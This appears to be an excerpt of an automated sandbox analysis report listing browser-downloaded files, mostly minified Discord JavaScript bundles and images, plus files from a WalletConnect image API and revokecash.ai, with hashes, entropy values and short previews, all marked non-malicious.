                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["55348"],{876779:function(I,N,A){I.exports={Common:{OPEN_DISCORD:"Open Discord",SIGN_UP_NOW:"Sign Up Now"},Footer:{READY_TO_TRY_DISCORD:"Ready to try Discord? It's free!",JOIN_OVER_PLAYERS_TODAY:"JOIN OVER {num} MILLION PLAYERS TODAY"},Navigation:{HOME:"Home",FEATURES:"Features",NITRO:"Nitro",DOWNLOAD:"Download",PARTNERS:"Partners",BLOG:"Blog",MORE:"More",STATUS:"Status",FEEDBACK:"Feedback",HELP_AND_SUPPORT:"Help & Support",GUIDELINES:"Guidelines",HYPESQUAD:"HypeSquad",STREAMKIT:"StreamKit",COMPANY:"Company",JOBS:"Jobs",SECURITY:"Security",DEVELOPERS:"Developers",DOCUMENTATION:"Documentation",BRANDING:"Branding",LOGIN:"Login",OPEN:"Open",PRODUCT:"Product",RESOURCES:"Resources",APPLICATIONS:"Applications",TERMS:"Terms",PRIVACY:"Privacy",ABOUT:"About",VERIFICATION:"Verification",RICH_PRESENCE:"Rich Presence",PRESS_INQUIRIES:"Press Inquiries",OPEN_SOURCE:"Open Source",SUPPORT:"Support",DEVELOPER_PORTAL:"Developer Porta
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                          Category:downloaded
                                                                          Size (bytes):2090
                                                                          Entropy (8bit):7.829116068458293
                                                                          Encrypted:false
                                                                          SSDEEP:48:Sp9achqmG408C70Yqf8GRY10jltFNYK4gLrzevJz/:k9hqe03qf8GRLVN2z/
                                                                          MD5:2052EA08B332C87388DC42097624CB20
                                                                          SHA1:8B82E1E2DD5A482AE90433C763B268B99F6CF093
                                                                          SHA-256:11A824E4C63932EC7C2684C8C9554C84461EFB5D731D15387D77BB5C3E78F9D5
                                                                          SHA-512:ACB64A1A9A15113C89FD2EB8CDC5576C91E91FAD1E85F67882D00EA67333BD5CABBFAA4F5BE1A10726AAC21335A2B92E9EFD2DB808758A666ED988D5DA2AA7D8
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://explorer-api.walletconnect.com/w3m/v1/getWalletImage/a7f416de-aa03-4c5e-3280-ab49269aef00?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1
                                                                          Preview:RIFF"...WEBPVP8X..............ALPH..........6.Z....rK.0'Z..,{.S8q...*.S.(..f.9....a..4...R.Z....../LM....?"&.....(..8R.....2.G..GUE....[.=.r..f....=.a.(..../.~.04M..i..r,Q)..K1tm.n.tEt"..7u....U.<.#.f.~.P...>.....4..m..+N...f(....N.-9.ah._.x.nR...C......5-..c........!t*2Q..\..p.Mt...C6'.Z..GXO..K3......I.MY...r.R.q....,...)C...e...W...M.E.I...F..r8..\..[ o.....*.iR.%C.gK%.........s.M.....8...&x7....e..*C.d.`..(C..q...0.?.7D.......1..-.......no.*...(.Q....O.{2K....{........_./.........Em.....8#....=......W1"\%v....Jg.u*.K:q.fd._.|G.1...v:H.v......J.un.Q.(..(.y.Q..J.......Z8......~....@.#..jj....>....Fj..RC..5..A.QC.q.s.s.s.s.s.s.s.s.s.s.s.s.s.s.s.s.s.s.s.s.s.s.s.s.s......r.5h/..Q..Z......j?............-..~....>K.'.......5%....u....p.Q..7.|E.o>..(K.A{i.%F..).\..`.....T.-.N.[Tp..3q%...;..Oi..X..s...{......-.n..(.;B(....n.........d.O..=......=....%*........Aa...&..R.ox...F....9.....u.`.P..9u.d.....o...C.e.-{~...l.. .*....r....>..!....z.i..<0?
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (49324)
                                                                          Category:downloaded
                                                                          Size (bytes):49379
                                                                          Entropy (8bit):4.842541813196561
                                                                          Encrypted:false
                                                                          SSDEEP:768:Px7M4QHFT05NLMoIcbrI6fuNvrn7/B/JDXNRscPitczUcdELfL9C3/cecMcqaB6Q:CttyctM481IBGRSZH/wq9di
                                                                          MD5:264FDF0094B5D416AB5FCB70A1F52CA4
                                                                          SHA1:F76C8AAFE7D2EA911DE8CE22BFBAA66D974CD348
                                                                          SHA-256:73487F57BC5D9A1A20CA844EEA8D8E14799184CE34FDF2E31C70A502955B0380
                                                                          SHA-512:EFD242695983CFD4F348317A227FEC75ED73AA1FD0DA9786BDE050589C4F0E4D9E3C7F8C24B0464C838429323A20C9D35A76591DFA33778E451104974C364F63
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/68560.e27fd85667a295676749.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["68560"],{528502:function(a,l,s){"use strict";s.r(l),s.d(l,{default:function(){return c}});var t=s("37983");function c(a){return(0,t.jsxs)("svg",{...a,xmlns:"http://www.w3.org/2000/svg",xmlnsXlink:"http://www.w3.org/1999/xlink",viewBox:"0 0 1700 1200",children:[(0,t.jsxs)("defs",{children:[(0,t.jsxs)("linearGradient",{id:"linear-gradient",x1:"269.71",x2:"269.71",y1:"800.4",y2:"913.29",gradientUnits:"userSpaceOnUse",children:[(0,t.jsx)("stop",{offset:"0",stopColor:"#29cc7a"}),(0,t.jsx)("stop",{offset:"1",stopColor:"#038567"})]}),(0,t.jsxs)("linearGradient",{id:"linear-gradient-2",x1:"1512.99",x2:"1503.54",y1:"519.46",y2:"476.33",gradientUnits:"userSpaceOnUse",children:[(0,t.jsx)("stop",{offset:"0",stopColor:"#ffe75c"}),(0,t.jsx)("stop",{offset:"1",stopColor:"#ffc619"})]}),(0,t.jsx)("linearGradient",{id:"linear-gradient-3",x1:"1441.31",x2:"1426.37",y1:"493.59",y2:"538.11",xlinkHref:"#linear-gradient-2"}),(0,t.jsxs)("l
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (7957)
                                                                          Category:downloaded
                                                                          Size (bytes):8013
                                                                          Entropy (8bit):5.413943580394907
                                                                          Encrypted:false
                                                                          SSDEEP:96:OmEF5PH5EqKUICO6nmsYTT7dBo9m9fKyfZO+GtklACh7RUEokzcvQ1q2hfrEPu8r:8vcXwK7dBFO+GmtDTFckC2kkeH
                                                                          MD5:C608E8B987D3EFC4E3AA6DD0CEE79B34
                                                                          SHA1:1A144C541BCFF8280341142612C9E4C5E862C3E3
                                                                          SHA-256:FCC7FF1DE40DDD354ADE611A847DB1C1DF00685916C4D01FBCCB0A0E6275A1E9
                                                                          SHA-512:610A281C9FE07B8904A6D05A2C37D10FE45C74D6C46B7FEA29DA138680C680269BDB703CA15D10ED21306B5F249C18F2E8F8A3EF0BA30420D4100F926E1A3484
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/sentry.14a93a5009fad9a88b94.js
                                                                          Preview:!function(){var t,e={370692:function(t,e,n){"use strict";n("918437")("Float32",function(t){return function(e,n,r){return t(this,e,n,r)}})},667500:function(t,e,n){"use strict";n("918437")("Float64",function(t){return function(e,n,r){return t(this,e,n,r)}})},477315:function(t,e,n){"use strict";n("918437")("Int16",function(t){return function(e,n,r){return t(this,e,n,r)}})},527135:function(t,e,n){"use strict";n("918437")("Int32",function(t){return function(e,n,r){return t(this,e,n,r)}})},453061:function(t,e,n){"use strict";n("918437")("Int8",function(t){return function(e,n,r){return t(this,e,n,r)}})},659510:function(t,e,n){"use strict";n("918437")("Uint16",function(t){return function(e,n,r){return t(this,e,n,r)}})},990131:function(t,e,n){"use strict";n("918437")("Uint32",function(t){return function(e,n,r){return t(this,e,n,r)}})},332822:function(t,e,n){"use strict";n("918437")("Uint8",function(t){return function(e,n,r){return t(this,e,n,r)}},!0)},390493:function(t,e,n){n("70102"),n("424973
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (43803)
                                                                          Category:downloaded
                                                                          Size (bytes):43858
                                                                          Entropy (8bit):5.538029673978354
                                                                          Encrypted:false
                                                                          SSDEEP:768:v63Uij/Gnod1nKE5pZLryIHo9OaqDTVfLmZn:Vnod1Np1y2aaVfLmZn
                                                                          MD5:3152B1D6FFFCEF2B63DB9CD3C6DE7C00
                                                                          SHA1:863D9C896BCAC1F8D141E87F3EE37C4D2E6E359C
                                                                          SHA-256:4E01932C566C4F1118BD3219B696E16A68685CA7E5A8FA57FFA36264C247AA43
                                                                          SHA-512:4BD91122BC0C158F9E6FE87F61AD49E165531BC31471236163AE2893C6B1CD291ECF7D20B24E0C1D6E71BA468EE0F216C40628C572F8A1827129E54A5ACBC92B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/47146.57a6c7b40e47673fbb30.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["47146"],{968194:function(e,t,i){"use strict";i.r(t),i.d(t,{sync:function(){return r},play:function(){return d},getMetadata:function(){return o}}),i("70102");var n=i("872717"),l=i("913144"),a=i("824563"),u=i("49111");function r(e,t){l.default.dispatch({type:"ACTIVITY_SYNC",activity:e,userId:t})}function d(e,t){o(e,t).then(i=>l.default.dispatch({type:"ACTIVITY_PLAY",activity:e,userId:t,metadata:i})).catch(()=>l.default.dispatch({type:"ACTIVITY_PLAY",activity:e,userId:t}))}function o(e,t){let i=e.metadata;if(null!=i)return Promise.resolve(i);let r=a.default.getActivityMetadata(t);return null!=r?Promise.resolve(r):null==e.session_id?Promise.reject(Error("null/undefined session_id")):n.default.get({url:u.Endpoints.USER_ACTIVITY_METADATA(t,e.session_id,e.application_id),oldFormErrors:!0}).then(e=>{let{body:i}=e;return l.default.dispatch({type:"ACTIVITY_METADATA_UPDATE",metadata:i,userId:t}),i})}},901582:function(e,t,i){"
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (9485)
                                                                          Category:downloaded
                                                                          Size (bytes):9542
                                                                          Entropy (8bit):5.40223443918401
                                                                          Encrypted:false
                                                                          SSDEEP:192:3xL6I887aTsXx1nDIj81eAjAs/5krfrlAyIFI1FDEl+hSUXUHLmnj40:hL/B1nDIj8UMA8KDGyIF4sUom
                                                                          MD5:D5DE499452EBB787F87267ABAB4C37EB
                                                                          SHA1:DF8E59940E06FC5ABD5AE955E27B9FE3BFE1235A
                                                                          SHA-256:78DCDE4237F7B9368F49A1D6C038FA956E3D3B21BBB41D29D308D46525F5BDBB
                                                                          SHA-512:12A66498F8146B9DF4C44C973BC9ECB376B4FFC01CA96A102BF5E09159449483BE828AF4229AA19C03FC2394B709383C5673C13AF0B93FBCCAF35E9AB0970428
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/18409.cf59ec1aee18034022a9.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["18409"],{869586:function(t,e,n){"use strict";n.r(e),n.d(e,{BlindID:function(){return r}}),n("311790"),n("477657"),n("811875"),n("90301"),n("652153"),n("28797"),n("817884"),n("597349"),n("667536"),n("690341");var o=n("605250"),a=n("446825").Buffer;let l=new o.default("BlindID");class r{async blind(t){let e=await this.key,n=new BigUint64Array([BigInt(t)]),o=await crypto.subtle.sign("HMAC",e,n.buffer);return r.truncate(o).toString()}static truncate(t){let e=new Uint8Array(t);return e.length<8?(l.error("Unexpected byte length ".concat(e.length)),BigInt(0)):BigInt(e[0])|BigInt(e[1])<<BigInt(8)|BigInt(e[2])<<BigInt(16)|BigInt(e[3])<<BigInt(24)|BigInt(e[4])<<BigInt(32)|BigInt(e[5])<<BigInt(40)|BigInt(e[6])<<BigInt(48)|BigInt(e[7])<<BigInt(56)}constructor(t){let e=a.from(t,"hex");this.key=crypto.subtle.importKey("raw",e,{name:"HMAC",hash:"SHA-512"},!1,["sign"])}}},890747:function(t,e,n){"use strict";n.r(e),n.d(e,{uploadRtc
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 640x213, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):16661
                                                                          Entropy (8bit):7.858826361098763
                                                                          Encrypted:false
                                                                          SSDEEP:192:hYNMtKwO3lLO3WLdjHQ8YCOL5XZtS3JKwX0T3TVL81qMf8usSeTm0qs/gbd2zbJK:hYNg7wOIWCUvS5js5L81qRuJ0//bDvaV
                                                                          MD5:E44C437F9459ADCE35CFC137798F4C75
                                                                          SHA1:33E53DF01FF6383C89217DADA973B7CA94406834
                                                                          SHA-256:03586B7BDBDAA14D1A09FDE868F6B3996C1666A2742E851BC922636A8102E248
                                                                          SHA-512:83A26DA09522F755AC3792FFE4E188361D2628602A7986D78A310CEB2267D7D894BF155D010C5F9A27083CCA061A3C46FCF91B5D13E92C5ABCB2631090161D86
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://revokecash.ai/_img/premint.jpg
                                                                          Preview:......JFIF.....H.H.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65528), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):96858
                                                                          Entropy (8bit):5.3198122952213325
                                                                          Encrypted:false
                                                                          SSDEEP:768:q3lKnnwHevQR2ixtu8Lhs81VziBHG69T/ROefPlTMq9ly9g0usvinsnMf3RJ3Qmo:nnwH7wixrdL1RiBmiPtIJnkdfD7V+
                                                                          MD5:844F12CC6198B2C094F4123B9FF0A140
                                                                          SHA1:A36E874CE262717619E0A553B4F76FD54AFC59F1
                                                                          SHA-256:DF61F5B3C89DB3AA1E165E77F6C589CC79D5AEAAA6F84A77195F376D3981CC96
                                                                          SHA-512:40E74DF378071251428F8AFA42AA04C0914B07D9CB75AC6B10106EBD55942069933E907A4FA41B2D3E12D4EE1A852F6D1A47225546CF6AEA3A7CDBC965803693
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/49554.34f5589cb37c5b3e60d3.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["49554"],{55942:function(e,t,r){e.exports={RBTree:r("768661"),BinTree:r("864297")}},864297:function(e,t,r){var n=r("78798");function Node(e){this.data=e,this.left=null,this.right=null}function i(e){this._root=null,this._comparator=e,this.size=0}Node.prototype.get_child=function(e){return e?this.right:this.left},Node.prototype.set_child=function(e,t){e?this.right=t:this.left=t},i.prototype=new n,i.prototype.insert=function(e){if(null===this._root)return this._root=new Node(e),this.size++,!0;for(var t=0,r=null,n=this._root;;){if(null===n)return n=new Node(e),r.set_child(t,n),ret=!0,this.size++,!0;if(0===this._comparator(n.data,e))return!1;t=0>this._comparator(n.data,e),r=n,n=n.get_child(t)}},i.prototype.remove=function(e){if(null===this._root)return!1;var t=new Node(void 0),r=t;r.right=this._root;for(var n=null,i=null,o=1;null!==r.get_child(o);){n=r,r=r.get_child(o);var s=this._comparator(e,r.data);o=s>0,0===s&&(i=r)}
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (31467)
                                                                          Category:downloaded
                                                                          Size (bytes):31522
                                                                          Entropy (8bit):5.663824222786782
                                                                          Encrypted:false
                                                                          SSDEEP:384:j58807damuDXbvrQv85QPamKyPvRThJyH7D68D85UbHVMUqUNHuzybVyB1qE:j5880xamM0vD9hJW77waVhOyfE
                                                                          MD5:C5837C68AA96F4B90AD7577D4D0A8843
                                                                          SHA1:55A9D870EE3ADF936D0393431A6CAA2D3E0F7D2D
                                                                          SHA-256:7F86DD53A701109AD9875DFDB5A421B8BE3553CD0C72B16986C2B197717C0924
                                                                          SHA-512:C6BBCB5F90B07DDD2567C106FCF292743D2B5EE390883682631A18CA9E68410B9D4F724E112442BA9E1B67ED299BE14118FE76A2D90DDFED1E5B82CA5BC76355
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/77015.bb8daebc6abe745c8fdd.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["77015"],{640583:function(e,t,n){"use strict";n.r(t),n.d(t,{createLayout:function(){return i},setWidgetLayout:function(){return o},setTopWidget:function(){return r},togglePinned:function(){return d},deleteWidget:function(){return E},deleteAllWidgets:function(){return u},createWidget:function(){return _},createWidgets:function(){return s}});var a=n("913144"),l=n("819068");function i(e,t){let n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:l.OVERLAY_DEFAULT_RESOLUTION;a.default.dispatch({type:"LAYOUT_CREATE",layoutId:e,widgets:t,defaultResolution:n})}function o(e,t,n){a.default.dispatch({type:"LAYOUT_UPDATE_WIDGET",widgetId:e,anchor:t,size:n})}function r(e){a.default.dispatch({type:"LAYOUT_SET_TOP_WIDGET",widgetId:e})}function d(e){a.default.dispatch({type:"LAYOUT_SET_PINNED",widgetId:e})}function E(e){a.default.dispatch({type:"LAYOUT_DELETE_WIDGET",widgetId:e})}function u(e){a.default.dispatch({type:"LAYOUT_
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):20966
                                                                          Entropy (8bit):7.984913243881453
                                                                          Encrypted:false
                                                                          SSDEEP:384:rrgAhXkoqWFiys6gZGyJKT97RFFwKdd42L/f+mklx4rZLmceeSegx3D/nxdQTtL:gAhXkwiyLgZGyYn0If+rxaLm9l7x4d
                                                                          MD5:550DDA9027688B4960563B18B541ECF9
                                                                          SHA1:9576B6E174E11A5FFA1A41D831303050F31FDB18
                                                                          SHA-256:FE5422EC939527F5FDC4E8069A22E330ADE213C0C0565C85F0A72EF4B21A5E4F
                                                                          SHA-512:3BDF403909A8C8E848ECE034AC232BF42F3C1244E5F6827A7CAC9938036F10A94E88D34162614A3AE5DC718190AD81F187EC10CCFBFEBD0DB02440C423E5231A
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR................M....pHYs............... .IDATx..wX....im..&l....{.7.(h.ZW.n]U.e...jk....:..vo.vWA......<....'(..+@ ..|......Q...V.>...+...~..../....M..M..5r.z..5..........-..F..q..o.*..j7J...J.{J....z.....lbC..\........u.n6..2..&.3....\8...dqv.8......Irc...F...hb.........w.6pz;...&6|...}....*]..=.).'nl...&6R..Ld*7.F.../_.E..l....z..?@..4.a....6...."c....ho..8......k@.e..tn`....Q.}.}...F.m....-|D.....n..=.\........n.....\...F.....`....`.....A..#.7.nB.C.F...7..!Z#............M.x...pC.&t<Dk...u.].-+F.?...M.....c..-|-.......,#.......w..C..59@W3..-. n...v..i...6...r.....-....o[...V....v.y{..pi."...*.. ...Q8.E.A..9...7.....j.R....f.........IN.4..4.@............;..;.#.nT..v....,.3.*.3.....K.yU.F..1...2....My;.L;....l..F.+(...e....^}.).3.<.h....6.D].l%_/....m*yq..h}.!oV...8...h!...#C........0i|Z.I.I&...$.$K._.K.*.H~.l......].E2.3HJN.I.H 1I.$8*.DFxK..X..&|q.WA.?t...!\...R0.....I.5e...K.Xg'9=.\...?3.W.f.K.g........qdBdorV..f...bR3..j..`r}.TT.@
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):78566
                                                                          Entropy (8bit):5.739552417339407
                                                                          Encrypted:false
                                                                          SSDEEP:1536:6Ypa8PYBSKuHnvkJdrBTheU1huo7o/wVgn7VCXVO9WzsUOxaBOO:Npa8PYBSpHnKBTheU1huo7o/wVgn7VCp
                                                                          MD5:A1A904B4B0B523672071A966FF6E42FD
                                                                          SHA1:9D041F7FAC5E5B81AD42E86A07C3712E6865F0AB
                                                                          SHA-256:45F7F2C917D503968D266AD407533853225FD68C3E1052B38599C42972A8B49E
                                                                          SHA-512:72D1E22E28AA8D01B7BAF85CF09F1E823200BBF794B946B729E22CB6A1C323C62E9F0CD408516B3808FE2A8E4B3CAEDC55B4E4FED02BFB186A1812FC55FCB9B3
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/47387.4470209d33fc5d80f673.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["47387"],{609708:function(e,t,n){"use strict";e.exports=n.p+"4a1620da08f098314241.svg"},602291:function(e,t,n){"use strict";e.exports=n.p+"ac64a4b16416154663f7.svg"},939784:function(e,t,n){"use strict";e.exports=n.p+"3af18e66cab696affd74.svg"},769015:function(e,t,n){"use strict";e.exports=n.p+"789cbb1aaa8190be1c18.svg"},393828:function(e,t,n){"use strict";e.exports=n.p+"714405524ef39906bd06.png"},481927:function(e,t,n){"use strict";e.exports=n.p+"75ad54f57ebd84babdf2.svg"},527382:function(e,t,n){"use strict";n.r(t),n.d(t,{FileUploadIconClassNames:function(){return s},DEFAULT_FILE_UPLOAD_ICONS:function(){return a},EMOJI_FILE_UPLOAD_ICONS:function(){return o}});var i,r,l=n("831839");(i=r||(r={}))[i.IMAGE=0]="IMAGE",i[i.DOCUMENT=1]="DOCUMENT",i[i.CODE=2]="CODE";let s={0:l.image,1:l.document,2:l.code},a=[1,0,2],o=[0,0,0]},109036:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return o}});var i=n("37983");n
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (19213)
                                                                          Category:downloaded
                                                                          Size (bytes):19268
                                                                          Entropy (8bit):5.618076259474097
                                                                          Encrypted:false
                                                                          SSDEEP:384:tKao08zKW5T3PCHI2cTu5cpVUGyeocg1tsEx2HnGyceu+UovBdM0gn/e:tKM8L6I2cTuxGRdstsExcnzJWG
                                                                          MD5:1A77EF5E8146F3DD98D15C420F7AF308
                                                                          SHA1:0E3D6B21C86C5EA0CAAA680630BE84F7C0C004BE
                                                                          SHA-256:A6F893C86FA9129E53EB6996D960E535EE5565F41148482269FFF5E3BB811758
                                                                          SHA-512:9DAB3148D1DE8E9D0788C71EC03FA0B946374637A9A7226AC67E5373EE7C934D10B4CF04E8C3240BECC098356BA0E619A8A7FCEDBA2595D1ACEF6ED3D034784E
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/21413.04451f046a440f45bd24.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["21413"],{27562:function(t,e,n){"use strict";t.exports=n.p+"6adc630fe0534895ff0f.mp4"},851703:function(t,e,n){"use strict";t.exports=n.p+"f3c9e56752e6e7dae615.mp4"},902577:function(t,e,n){"use strict";t.exports=n.p+"61220d00e627e7f4a440.png"},351288:function(t,e,n){"use strict";t.exports=n.p+"c3f841e9edf0f8c90ca2.mp4"},595726:function(t,e,n){"use strict";t.exports=n.p+"c694675351be2cd8923b.png"},462641:function(t,e,n){"use strict";t.exports=n.p+"0a10740d903f2a7e3f1e.png"},95937:function(t,e,n){"use strict";t.exports=n.p+"4c6d753b661bdac6ed49.png"},929461:function(t,e,n){"use strict";t.exports=n.p+"a1aa5e5cf3f255bb84cd.mp4"},686298:function(t,e,n){"use strict";n.r(e),n.d(e,{ApplicationStreamResolutions:function(){return i},getApplicationResolution:function(){return _},ApplicationStreamFPS:function(){return u},ApplicationStreamPresets:function(){return r},getApplicationFramerate:function(){return f},ApplicationStreamP
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (15397)
                                                                          Category:downloaded
                                                                          Size (bytes):15452
                                                                          Entropy (8bit):5.360769878072779
                                                                          Encrypted:false
                                                                          SSDEEP:384:EvydhMKE73l5GhZ2zzzKxuJnGzBwEGwucU:EF73jiuJnG1uV
                                                                          MD5:C36221DC66E07594241FF3EFA57D8C49
                                                                          SHA1:5ACEC2FE733B73FA3EC1B4E6230958D9BA119A2F
                                                                          SHA-256:31DF772972EECC8DB517224363A97AE0A98BCD91B72F8AB2ECE423198A970B90
                                                                          SHA-512:2DE5B45286350F80642C71ACD5A63D9BC2DD6F764101B76BEB7FE4AF6664AF8A7013E5189C5F5FB6DB3AF14D18AA7C2D3CC65963ABC821DA4C01F6323BA957A0
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/81161.abe9578e4d66ca1934cd.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["81161"],{757767:function(e,t,n){"use strict";var u,l;n.r(t),n.d(t,{RecurrenceOptions:function(){return u}}),(l=u||(u={}))[l.NONE=0]="NONE",l[l.WEEKLY=1]="WEEKLY",l[l.MONTHLY=2]="MONTHLY",l[l.YEARLY=3]="YEARLY",l[l.WEEKDAY_ONLY=4]="WEEKDAY_ONLY"},777367:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return r}});var u=n("862205");let l=(0,u.createExperiment)({kind:"guild",id:"2023-09_guild_events_auto_start",label:"Allow users to toggle automatically start events",defaultConfig:{canUseEventsAutoStartToggle:!1},treatments:[{id:1,label:"User can see autostart toggle",config:{canUseEventsAutoStartToggle:!0}}]});var r=l},322224:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return y}});var u=n("872717"),l=n("913144"),r=n("987317"),d=n("393414"),i=n("271938"),a=n("271560"),c=n("777367"),o=n("398604"),s=n("189443"),E=n("745049"),_=n("49111"),y={startEvent:(e,t)=>u.default.patch({url:_.Endpoint
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (43896)
                                                                          Category:downloaded
                                                                          Size (bytes):43897
                                                                          Entropy (8bit):4.509494049319466
                                                                          Encrypted:false
                                                                          SSDEEP:384:Naq3ksqknr2NH0Db+CrPtwa0p0BuJsLsBrHMDolD0ACaXb2SJhqTLEjeCJmO6PUr:f3ks1nKNH6ZuJTyeLvXbEj5UKxfE3
                                                                          MD5:126CBBC8F9E87EF773B34B2AD12CC29F
                                                                          SHA1:D815F67EB3BC8CB7DC7022667A46527DD4DCC049
                                                                          SHA-256:403780F924CBFC9736B7F3E1761F1E3F996B7F573AC76B56ADED45D27EE70EB5
                                                                          SHA-512:74275D036532BDA000C51A27F93BB39ABDD0BFE1DF1CB5CF0D8819A0CA7A346BD84CA66691BFE99D0AB7EFF426D8A1B720BE52DD8C5A758B7D4960011699C2FF
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/api/v9/experiments?with_guild_experiments=true
                                                                          Preview:{"fingerprint":"1183449386894770317.ims3tmo8uZKLFPG2Q4wQClw3Was","assignments":[[4130837190,0,10,-1,0,2339,0,0],[4181417939,0,1,-1,6,4644,0,0],[2810205487,1,1,-1,3,5399,0,0],[3316720711,0,1,-1,1,7667,0,0],[156590431,0,1,-1,2,9609,0,0],[2617218444,4,1,-1,2,8707,0,0],[3035674767,0,1,-1,0,5696,0,0],[1609782151,0,1,-1,2,1701,0,0],[3354177721,0,1,-1,0,3592,0,0],[3643362751,0,1,-1,0,86,0,0],[3753034466,1,2,-1,0,2472,0,0],[2854861606,0,1,-1,1,7258,0,0],[1913882179,0,1,-1,2,1052,0,0],[1567199723,0,1,-1,1,462,0,0],[3091068323,0,2,-1,10,6427,0,0],[454783470,4,1,-1,0,6569,0,0],[3615787841,0,1,-1,0,5846,0,0],[2486591316,0,1,-1,1,7430,0,0],[2542634194,0,1,-1,0,1179,0,0],[3450899088,1,1,-1,0,3019,0,0],[3656796460,3,0,-1,3,1625,0,0],[1176769702,1,1,-1,2,5221,0,0],[2519288568,0,1,-1,4,5014,0,0],[1814483290,0,1,-1,0,8588,0,0],[4221006726,0,1,-1,0,7298,0,0],[4156073260,3,2,-1,0,3053,0,0],[3482807542,13,1,-1,1,4954,0,0],[1398673921,1,1,-1,0,5973,0,0],[2532700533,0,1,-1,0,2473,0,0],[1312831343,0,2,-1,0,27
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, ASCII text
                                                                          Category:downloaded
                                                                          Size (bytes):151
                                                                          Entropy (8bit):4.764747658941477
                                                                          Encrypted:false
                                                                          SSDEEP:3:PouV7uJzhquHbtt6vYk2ZRMRJfHKERSAEtvxLrXZiLKY8KWg518K6c4NGL:hxuJzhqIzyYk+qRU4zEdxXZiqNO18K3T
                                                                          MD5:076A2E42D65349000E50BEB304C7E9FB
                                                                          SHA1:336D2B9F8673C40AEBAE49A7707049CBA071AE12
                                                                          SHA-256:8933C163D96EE11356F1FA97C8BCC9E0673A56F39823D956B89FBD3D2DCCD842
                                                                          SHA-512:736F39F70E457A82E878F39A22883E6F5A0C23D9B0E58941574F0B91012EF0CD697D1AB3138B2B5ED9B5822D57C53DA3E6C168F65D9F5219DBA5042A69E26964
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://revokecash.ai/sponsorships
